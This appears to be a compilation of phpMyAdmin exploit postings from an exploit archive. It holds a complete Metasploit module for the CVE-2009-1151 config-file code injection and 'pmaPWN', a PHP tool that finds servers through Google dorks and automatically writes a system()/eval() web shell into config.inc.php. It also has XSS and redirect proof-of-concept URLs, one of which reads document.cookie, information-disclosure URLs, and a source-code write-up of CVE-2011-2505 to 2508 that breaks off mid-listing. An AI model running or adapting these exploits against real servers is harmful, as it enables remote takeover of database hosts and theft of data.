~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe () yahoo com
Janek Vind "waraxe"
Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------
metasploit/PhpMyAdmin Config File Code Injection ( php)
##
# $Id: phpmyadmin_config.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PhpMyAdmin Config File Code Injection',
'Description' => %q{
This module exploits a vulnerability in PhpMyAdmin's setup
feature which allows an attacker to inject arbitrary PHP
code into a configuration file. The original advisory says
the vulnerability is present in phpMyAdmin versions 2.11.x
< 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on
3.0.1.1.
The file where our payload is written
(phpMyAdmin/config/config.inc.php) is not directly used by
the system, so it may be a good idea to either delete it or
copy the running config (phpMyAdmin/config.inc.php) over it
after successful exploitation.
},
'Author' =>
[
'Greg Ose', # Discovery
'pagvac', # milw0rm PoC
'egypt' # metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'CVE', '2009-1151' ],
[ 'OSVDB', '53076' ],
[ 'URL', 'http://www.milw0rm.com/exploits/8921' ],
[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php' ],
[ 'URL', 'http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'Space' => 4000, # unlimited really since our shellcode gets written to a file
'DisableNops' => true,
# No filtering whatsoever, so no badchars
'Compat' =>
{
'ConnectionType' => 'find',
},
'Keys' => ['php'],
},
'Targets' =>
[
[ 'Automatic (phpMyAdmin 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1)', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 24 2009'))
register_options(
[
OptString.new('URI', [ true, "Base phpMyAdmin directory path", '/phpMyAdmin/']),
], self.class)
end
def exploit
# First, grab the session cookie and the CSRF token
print_status("Grabbing session cookie and CSRF token")
uri = datastore['URI'] + "scripts/setup.php"
response = send_request_raw({ 'uri' => uri})
if !response
raise RuntimeError.new("Server did not respond to our initial request")
return
end
if (response.body !~ /"token"\s*value="([^"]*)"/)
raise RuntimeError.new("Couldn't find token and can't continue without it. Is URI set correctly?")
return
end
token = $1
cookie = response["Set-Cookie"]
# There is probably a great deal of randomization that can be done with
# this format.
config = "a:1:{s:7:\"Servers\";a:1:{i:0;a:6:{s:#{payload.encoded.length + 13}:\""
config << "host']='';" + payload.encoded + ";//"
config << '";s:9:"' + rand_text_alpha(9) + '";s:9:"extension";s:6:"mysqli";s:12:"connect_type"'
config << ';s:3:"tcp";s:8:"compress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"' + rand_text_alpha(4) + '";}}}'
data = "token=#{token}&action=save&configuration="
data << Rex::Text.uri_encode(config)
data << "&eoltype=unix"
# Now that we've got the cookie and token, send the evil
print_status("Sending save request")
response = send_request_raw({
'uri' => datastore['URI'] + "/scripts/setup.php",
'method' => 'POST',
'data' => data,
'cookie' => cookie,
'headers' =>
{
'Content-Type' => 'application/x-www-form-urlencoded',
'Content-Length' => data.length
}
}, 3)
print_status("Requesting our payload")
# very short timeout because the request may never return if we're
# sending a socket payload
timeout = 0.1
response = send_request_raw({
# Allow findsock payloads to work
'global' => true,
'uri' => datastore['URI'] + "/config/config.inc.php"
}, timeout)
handler
end
end
Hacking Expose!/pmaPWN phpMyAdmin Code Injection Scanner ( na)
<?php
$list = array(
'/phpmyadmin/',
'/phpMyAdmin/',
'/PMA/',
'/pma/',
'/admin/',
'/dbadmin/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2.5.5-pl1/',
'/phpMyAdmin-2.5.6-rc1/',
'/phpMyAdmin-2.5.6-rc2/',
'/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/',
'/phpMyAdmin-2.5.7-pl1/',
'/phpMyAdmin-2.6.0-alpha/',
'/phpMyAdmin-2.6.0-alpha2/',
'/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/',
'/phpMyAdmin-2.6.0-rc1/',
'/phpMyAdmin-2.6.0-rc2/',
'/phpMyAdmin-2.6.0-rc3/',
'/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/',
'/phpMyAdmin-2.6.0-pl2/',
'/phpMyAdmin-2.6.0-pl3/',
'/phpMyAdmin-2.6.1-rc1/',
'/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/',
'/phpMyAdmin-2.6.1-pl1/',
'/phpMyAdmin-2.6.1-pl2/',
'/phpMyAdmin-2.6.1-pl3/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2/',
'/phpMyAdmin-2.6.2-pl1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-pl1/',
'/phpMyAdmin-2.6.4-rc1/',
'/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/',
'/phpMyAdmin-2.6.4-pl3/',
'/phpMyAdmin-2.6.4-pl4/',
'/phpMyAdmin-2.6.4/',
'/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/',
'/phpMyAdmin-2.7.0-pl1/',
'/phpMyAdmin-2.7.0-pl2/',
'/phpMyAdmin-2.7.0/',
'/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/',
'/phpMyAdmin-2.8.0-rc2/',
'/phpMyAdmin-2.8.0/',
'/phpMyAdmin-2.8.0.1/',
'/phpMyAdmin-2.8.0.2/',
'/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/',
'/phpMyAdmin-2.8.1-rc1/',
'/phpMyAdmin-2.8.1/',
'/phpMyAdmin-2.8.2/',
'/sqlmanager/',
'/mysqlmanager/',
'/p/m/a/',
'/PMA2005/',
'/pma2005/',
'/phpmanager/',
'/php-myadmin/',
'/phpmy-admin/',
'/webadmin/',
'/sqlweb/',
'/websql/',
'/webdb/',
'/mysqladmin/',
'/mysql-admin/',
);
if($argc > 1) {
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP version original http://milw0rm.com/exploits/8921\n";
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
print " greetz: Hacking Expose!, HM Security, darkc0de\n";
print "|****************************************************************|\n";
print "\n";
print "Usage: php $argv[0] \n";
exit;
}
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP version original http://milw0rm.com/exploits/8921\n";
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
print " greetz: Hacking Expose!, HM Security, darkc0de\n";
print "|****************************************************************|\n";
print "\n";
$Handlex = FOpen("pmaPWN.log", "a+");
FWrite($Handlex, "|****************************************************************|\n");
FWrite($Handlex, " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n");
FWrite($Handlex, " phpMyAdmin Code Injection RCE Scanner & Exploit\n");
FWrite($Handlex, " This is PHP version original http://milw0rm.com/exploits/8921\n");
FWrite($Handlex, " credit: Greg Ose, pagvac @ gnucitizen.org\n");
FWrite($Handlex, " greetz: Hacking Expose!, HM Security, darkc0de\n");
FWrite($Handlex, "|****************************************************************|\n\n");
print "[-] Master, where you want to go today? \n";
print "[-] example dork: intitle:phpMyAdmin \n";
fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s ");
$dork = trim(fgets(STDIN));
print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
for($i = 0; $i <= 900; $i+=100) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 200);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
$pg = curl_exec($ch);
curl_close($ch);
if (preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $pg, $links)) { $res[] = $links[2]; }
}
foreach($res as $key) {
foreach($key as $target) {
$total++;
}
}
print "[+] Done. $total rows return.\n";
FWrite($Handlex, "[+] Done. $total rows return.\n");
FClose($Handlex);
foreach($res as $key) {
foreach($key as $target) {
$Handlex = FOpen("pmaPWN.log", "a+");
$real = parse_url($target);
$url = "http://".$real['host'];
print "\n[-] Scanning phpMyAdmin on ".$url."\n";
FWrite($Handlex, "\n[-] Scanning phpMyAdmin on ".$url."\n");
FClose($Handlex);
sleep(5);
$curlHandle = curl_multi_init();
for ($i = 0;$i < count($list); $i++)
$curl[$i] = addHandle($curlHandle,$url.$list[$i]);
ExecHandle($curlHandle);
for ($i = 0;$i < count($list); $i++)
{
$text[$i] = curl_multi_getcontent ($curl[$i]);
//echo $url.$list[$i]."\n";
$Handlex = FOpen("pmaPWN.log", "a+");
if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]";
print "\n[+] Testing vulnerable, wait sec..\n";
FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]");
FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
print "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n";
FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n");
}
FClose($Handlex);
exploit_site($url.$list[$i]);
}
}
for ($i = 0;$i < count($list); $i++)//remove the handles
curl_multi_remove_handle($curlHandle,$curl[$i]);
curl_multi_close($curlHandle);
sleep(5);
}
}
function addHandle(&$curlHandle,$url)
{
$cURL = curl_init();
curl_setopt($cURL, CURLOPT_URL, $url);
curl_setopt($cURL, CURLOPT_HEADER, 0);
curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
curl_multi_add_handle($curlHandle,$cURL);
return $cURL;
}
//execute the handle until the flag passed
// to function is greater then 0
function ExecHandle(&$curlHandle)
{
$flag=null;
do {
//fetch pages in parallel
curl_multi_exec($curlHandle,$flag);
} while ($flag > 0);
}
function exploit_site($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 200);
curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");
$result = curl_exec($ch);
curl_close($ch);
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_HEADER, 1);
curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");
$result2 = curl_exec($ch2);
curl_close($ch2);
//print $url;
if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
print "\n[+] Exploiting, wait sec..\n";
$Handlex = FOpen("pmaPWN.log", "a+");
FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
FClose($Handlex);
exploit($url);
}
else {
$Handlex = FOpen("pmaPWN.log", "a+");
print "\n[-] Shit! no luck.. not vulnerable\n";
FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
FClose($Handlex);
}
}
function exploit($w00t) {
$Handlex = FOpen("pmaPWN.log", "a+");
$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
//first get cookie + token
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 200);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
$result = curl_exec($curl);
curl_close($curl);
if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches));
$token = $matches[1][1];
if ($token != '') {
print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
$payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
print "\n[+] Sending evil payload mwahaha.. \n";
FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php");
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($curl, CURLOPT_TIMEOUT, 200);
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
curl_setopt($curl, CURLOPT_REFERER, $w00t);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
$result = curl_exec($curl);
curl_close($curl);
print "\n[!] w00t! w00t! You should now have shell here";
print "\n[+] ".$w00t."config/config.inc.php?c=id \n";
print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");
}
else {
print "\n[!] Shit! no luck.. not vulnerable\n";
FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
return false;
}
FClose($Handlex);
if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
//exit();
}
?>
pmaPWN phpMyAdmin code injection remote command execution scanner and exploit.
Emanuele Gentili/phpMyAdmin Client Side Code Injection ( na)
PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification
Credits:
Emanuele 'emgent' Gentili <emgent@backtrack-linux.org>
Marco 'white_sheep' Rondini <white_sheep@backtrack-linux.org>
Alessandro 'scox' Scoscia <scox@backtrack.it>
In error.php, PhpMyAdmin permit to insert text and restricted tag, like BBCode.
With tag [a@url@page]Click Me[/a], you can insert your own page, and redirect all users.
Available tags are:
'[i]' => '<em>',
'[/i]' => '</em>',
'[em]' => '<em>',
'[/em]' => '</em>',
'[b]' => '<strong>',
'[/b]' => '</strong>',
'[strong]' => '<strong>',
'[/strong]' => '</strong>',
'[tt]' => '<code>',
'[/tt]' => '</code>',
'[code]' => '<code>',
'[/code]' => '</code>',
'[kbd]' => '<kbd>',
'[/kbd]' => '</kbd>',
'[br]' => '<br />',
'[/a]' => '</a>',
'[sup]' => '<sup>',
'[/sup]' => '</sup>',
and replace '/\[a@([^"@]*)@([^]"]*)\]/' with '<a href="\1" target="\2">'
POC:
http://127.0.0.1/phpmyadmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br]It%27s+possible+use+some+special+tags+too[br]Found+by+Tiger+Security+Tiger+Team+-+[a%40http://www.tigersecurity.it%40_self]This%20Is%20a%20Link[%2Fa]
OWASP Reference:
http://www.owasp.org/index.php/Unvalidated_Input
phpMyAdmin suffers from client side code injection and redirect link falsification vulnerabilities.
Inj3ct0r/phpMyAdmin 2.6.1 Disclosure ( na)
=================================== phpMyAdmin <= 2.6.1 disclosure ways =================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com Site Production: www.phpmyadmin.net Product: phpMyAdmin 2.6.1 Version: 2.6.1 disclosure ways: http://localhost/Tools/phpMyAdmin/tbl_properties.php?lang[]=ru-win1251 http://localhost/Tools/phpMyAdmin/tbl_properties.php?server[]=1 http://localhost/Tools/phpMyAdmin/tbl_properties.php?collation_connection[]=cp1251_general_ci http://localhost/Tools/phpMyAdmin/tbl_properties.php?db[]=aaa&table=aaa http://localhost/Tools/phpMyAdmin/sql.php?sql_query[]= http://localhost/Tools/phpMyAdmin/server_export.php?convcharset[]=iso-8859-1 ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]
phpMyAdmin version 2.6.1 suffers from information disclosure vulnerabilities.
ghostblup/phpMyAdmin For Windows 2.5.9 XSS ( na)
^ ~~~~~~~~~~~~~ Indonesia ~~~~~~~~~~^
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^
^~~~~~~~~~phpmyadmin for windows 2.5.9~~~~~~~~~^
Author : ghostblup
Date : 02-09-09
Location : Palembang, Indonesia
Blog : http://ghostblup.blogspot.com
Where : Cross-site scripting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Intro
Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in web applications which allow code injection by malicious web
and session/cookies stolen
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : phpMyAdmin for Windows
version : 2.5.9
Vendor : http://www.appservnetwork.com/
Downlaod : http://prdownloads.sourceforge.net/appserv/appserv-win32-2.5.9.exe?download
--------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
Critical Cross-site scripting (XSS).
appservlang variable in index.php is not in the filter that allows XSS
/ cross site scripting
Poc/Exploit:
~~~~~~~~~
http://localhost/index.php?appservlang=>"><ScRiPt%20%0a%0d>alert(112233)%3B</ScRiPt>
http://localhost/index.php?appservlang=>"><script>alert(document.cookie);</script>
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ My Love : Ratih Permata Sari
~ My friends : Amy,suset,revi,uwix^_^, Blackgirl ,
jasakreativkomputer, cyberlau , Vldaz
~ My inspiration : K-159 , y3dips,az001,Hero
~ ngetem community, sayap community , echo.or.id , PalComTech.com
~ #ngetem #mr_green #sayap #kegelapan @irc.allnetwork
---------------------------------------------------------------------------
Contact:
~~~~~~
ghostblup@gmail.com
My Blog: http://www.ghostblup.blogspot.com
~~~~~~~~~~~~~~~~~~~~~end~~~~~~~~~~~~~~
phpMyAdmin for Windows version 2.5.9 suffers from a cross site scripting vulnerability.
Mango/phpMyAdmin 3.x Remote Code Execution ( na)
phpMyAdmin 3.x Multiple Remote Code Executions
This post details a few interesting vulnerabilities I found while relaxing and reading the sourcecode of phpMyAdmin. My original advisory can be found here.
If you would like me to audit your PHP project, check out Xxor's PHP code auditing service.
The first vulnerability
File: libraries/auth/swekey/swekey.auth.lib.php
Lines: 266-276
Patched in: 3.3.10.2 and 3.4.3.1
Type: Variable Manipulation
Assigned CVE id: CVE-2011-2505
PMA Announcement-ID: PMASA-2011-5
266 if (strstr($_SERVER['QUERY_STRING'],'session_to_unset') != false)
267 {
268 parse_str($_SERVER['QUERY_STRING']);
269 session_write_close();
270 session_id($session_to_unset);
271 session_start();
272 $_SESSION = array();
273 session_write_close();
274 session_destroy();
275 exit;
276 }
Notice the call to parse_str on line 268 that passes the query string as it's first argument. It's missing a second argument. This means that what ever parameters and values are present in the query string will be used as variables in the current namespace. But since the code path that executes the call to parse_str inevitably leads to a call to exit there ain't much to exploit. However the session variables persists between requests. Thus giving us full control of the $_SESSION array.
From here on there are numerous XSS and SQL injection vulnerabilities open for attack. But we'll focus on three far more serious vulnerabilities.
The second vulnerability
Patched in: 3.3.10.2 and 3.4.3.1
Type: Remote Static Code Injection
Assigned CVE id: CVE-2011-2506
PMA Announcement-ID: PMASA-2011-6
File: setup/lib/ConfigGenerator.class.php
Lines: 16-78
16 /**
17 * Creates config file
18 *
19 * @return string
20 */
21 public static function getConfigFile()
22 {
23 $cf = ConfigFile::getInstance();
24
25 $crlf = (isset($_SESSION['eol']) && $_SESSION['eol'] == 'win') ? "\r\n" : "\n";
26 $c = $cf->getConfig();
27
28 // header
29 $ret = '<!--?php' . $crlf
30 . '/*' . $crlf
31 . ' * Generated configuration file' . $crlf
32 . ' * Generated by: phpMyAdmin '
33 . $GLOBALS['PMA_Config']--->get('PMA_VERSION')
34 . ' setup script' . $crlf
35 . ' * Date: ' . date(DATE_RFC1123) . $crlf
36 . ' */' . $crlf . $crlf;
37
38 // servers
39 if ($cf->getServerCount() > 0) {
40 $ret .= "/* Servers configuration */$crlf\$i = 0;" . $crlf . $crlf;
41 foreach ($c['Servers'] as $id => $server) {
42 $ret .= '/* Server: ' . strtr($cf->getServerName($id), '*/', '-') . " [$id] */" . $crlf
43 . '$i++;' . $crlf;
44 foreach ($server as $k => $v) {
45 $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);
46 $ret .= "\$cfg['Servers'][\$i]['$k'] = "
47 . (is_array($v) && self::_isZeroBasedArray($v)
48 ? self::_exportZeroBasedArray($v, $crlf)
49 : var_export($v, true))
50 . ';' . $crlf;
51 }
52 $ret .= $crlf;
53 }
54 $ret .= '/* End of servers configuration */' . $crlf . $crlf;
55 }
56 unset($c['Servers']);
57
58 // other settings
59 $persistKeys = $cf->getPersistKeysMap();
60
61 foreach ($c as $k => $v) {
62 $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);
63 $ret .= self::_getVarExport($k, $v, $crlf);
64 if (isset($persistKeys[$k])) {
65 unset($persistKeys[$k]);
66 }
67 }
68 // keep 1d array keys which are present in $persist_keys (config.values.php)
69 foreach (array_keys($persistKeys) as $k) {
70 if (strpos($k, '/') === false) {
71 $k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);
72 $ret .= self::_getVarExport($k, $cf->getDefault($k), $crlf);
73 }
74 }
75 $ret .= '?>';
76
77 return $ret;
78 }
On line 42 in this file a comment is created to show some additional information in a config file. We can see that the output of the call to $cf->getServerName($id) is sanitized to prevent user input from closing the comment. However $id, the key of the $c['Servers'] array, is not. So if we could rename a key in this array we could close the comment and inject arbitrary PHP code.
On line 26 the $c array is created from a call to $cf->getConfig().
File: libraries/config/ConfigFile.class.php
Lines: 469-482
469 /**
470 * Returns configuration array (full, multidimensional format)
471 *
472 * @return array
473 */
474 public function getConfig()
475 {
476 $c = $_SESSION[$this->id];
477 foreach ($this->cfgUpdateReadMapping as $map_to => $map_from) {
478 PMA_array_write($map_to, $c, PMA_array_read($map_from, $c));
479 PMA_array_remove($map_from, $c);
480 }
481 return $c;
482 }
Bingo! The $c array is derived from the $_SESSION array hence we could have full control of its contents by utilizing the first vulnerability. Now we can inject arbitrary PHP code that will be saved into the file config/config.inc.php. Then we would just browse to this file and the webserver would executed it.
This vulnerability requires one specific condition. The config directory must have been left in place after the initial configuration. This is something advised against and hence a majority of servers wont be susceptible to this attack. Therefor we'll check out a third and a fourth vulnerability.
The third vulnerability
Patched in: 3.3.10.2 and 3.4.3.1
Type: Authenticated Remote Code Execution
Assigned CVE id: CVE-2011-2507
PMA Announcement-ID: PMASA-2011-7
File: server_synchronize.php
Line: 466
466 $trg_db = $_SESSION['trg_db'];
Line: 477
477 $uncommon_tables = $_SESSION['uncommon_tables'];
Line: 674
674 PMA_createTargetTables($src_db, $trg_db, $src_link, $trg_link, $uncommon_tables, $uncommon_table_structure_diff[$s], $uncommon_tables_fields, false);
File: libraries/server_synchronize.lib.php
Lines: 613-631
613 function PMA_createTargetTables($src_db, $trg_db, $src_link, $trg_link, &$uncommon_tables, $table_index, &$uncommon_tables_fields, $display)
614 {
615 if (isset($uncommon_tables[$table_index])) {
616 $fields_result = PMA_DBI_get_fields($src_db, $uncommon_tables[$table_index], $src_link);
617 $fields = array();
618 foreach ($fields_result as $each_field) {
619 $field_name = $each_field['Field'];
620 $fields[] = $field_name;
621 }
622 $uncommon_tables_fields[$table_index] = $fields;
623
624 $Create_Query = PMA_DBI_fetch_value("SHOW CREATE TABLE " . PMA_backquote($src_db) . '.' . PMA_backquote($uncommon_tables[$table_index]), 0, 1, $src_link);
625
626 // Replace the src table name with a `dbname`.`tablename`
627 $Create_Table_Query = preg_replace('/' . PMA_backquote($uncommon_tables[$table_index]) . '/',
628 PMA_backquote($trg_db) . '.' .PMA_backquote($uncommon_tables[$table_index]),
629 $Create_Query,
630 $limit = 1
631 );
The variables $uncommon_tables[$table_index] and $trg_db are derived from the $_SESSION array. By utilizing the first vulnerability we can inject what ever we want into both the first and the second argument of the function preg_replace on lines 627-631. In a previous post to this blog I've detailed how this condition can be turned into a remote code execution. Basicly we can inject the "e" modifier into the regexp pattern which causes the second argument to be executed as PHP code.
This vulnerability have two major restrictions from an attackers perspective. First the Suhosin patch that completly defends against this type of attack. Second, this piece of code can only be reached if we're authenticated. So to exploit it we would need to have previous knowledge of credentials to an account of the database that phpMyAdmin is set up to manage. Except for some obscure configurations that allows us to bypass this restriction.
Since the Suhosin patch is pretty popular, and for example compiled by default in OpenBSD's PHP packages, it's worth exploring a fourth vulnerability.
The fourth vulnerability
Patched in: 3.3.10.2 and 3.4.3.1
Type: Path Traversal
Assigned CVE id: CVE-2011-2508
PMA Announcement-ID: PMASA-2011-8
File: libraries/display_tbl.lib.php
Lines: 1291-1299
1291 if ($GLOBALS['cfgRelation']['mimework'] && $GLOBALS['cfg']['BrowseMIME']) {
1292
1293 if (isset($GLOBALS['mime_map'][$meta->name]['mimetype']) && isset($GLOBALS['mime_map'][$meta->name]['transformation']) && !empty($GLOBALS['mime_map'][$meta->name]['transformation'])) {
1294 $include_file = $GLOBALS['mime_map'][$meta->name]['transformation'];
1295
1296 if (file_exists('./libraries/transformations/' . $include_file)) {
